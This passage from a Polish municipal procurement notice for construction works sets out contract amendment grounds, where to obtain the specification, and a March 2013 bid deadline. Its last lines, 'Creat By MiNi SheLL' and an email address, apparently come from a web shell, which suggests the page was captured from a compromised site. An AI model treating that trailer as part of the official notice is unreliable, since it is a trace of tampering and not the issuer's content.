b)  konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych  lub   materiałowych  niż  wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie   przewidzianych     rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem  przedmiotu  
   umowy albo ich zastosowanie     byłoby  korzystne dla Zamawiającego  lub ze względu na zmiany   obowiązującego prawa.  Zmiana ta będzie wprowadzona wyłącznie w zakresie umożliwiającym  oddanie przedmiotu  umowy do  użytkowania, a Zamawiający nie może ponieść ryzyka zwiększenia   wynagrodzenia z tytułu takich zmian.
           c)   roboty zamienne będą wykonywane przy zachowaniu nie pogorszonych norm, standardów   i parametrów.                
a)	 rezygnacja przez Zamawiającego z realizacji części robót będącej przedmiotem  umowy. W takim  przypadku  wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający 
zapłaci za   wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen z przetargu, po ich uprzednim  zinwentaryzowaniu.
      3)     Zmiany osobowe;
a)   Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się   co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa  w ustawie Prawo  budowlane lub innych ustawach, 
b)  Zmiana podwykonawców,
              c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.
     4)      Zmiana stawki podatku od towarów i usług VAT związana jest ze zmianą obowiązujących przepisów    prawa. W takim przypadku umowa ulegnie zmianie  w zakresie wysokości ceny brutto.
     5)      Zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych  w umowie     w celu jej doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony.    
     6)      Zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnej, 
              ekonomicznej lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem 
              możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający  dopuszcza możliwość zmiany 
              umowy, w szczególności terminu realizacji zamówienia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Greboszow/podmiotowe/zamówienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów
33-260 Gręboszów 144
pok. nr 2    lub za zaliczeniem pocztowym,  po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 100 zł  +  VAT 23%.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2013 godzina 10:00, miejsce: Urząd Gminy Gręboszów
33-260 Gręboszów 144
pok. nr 11 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com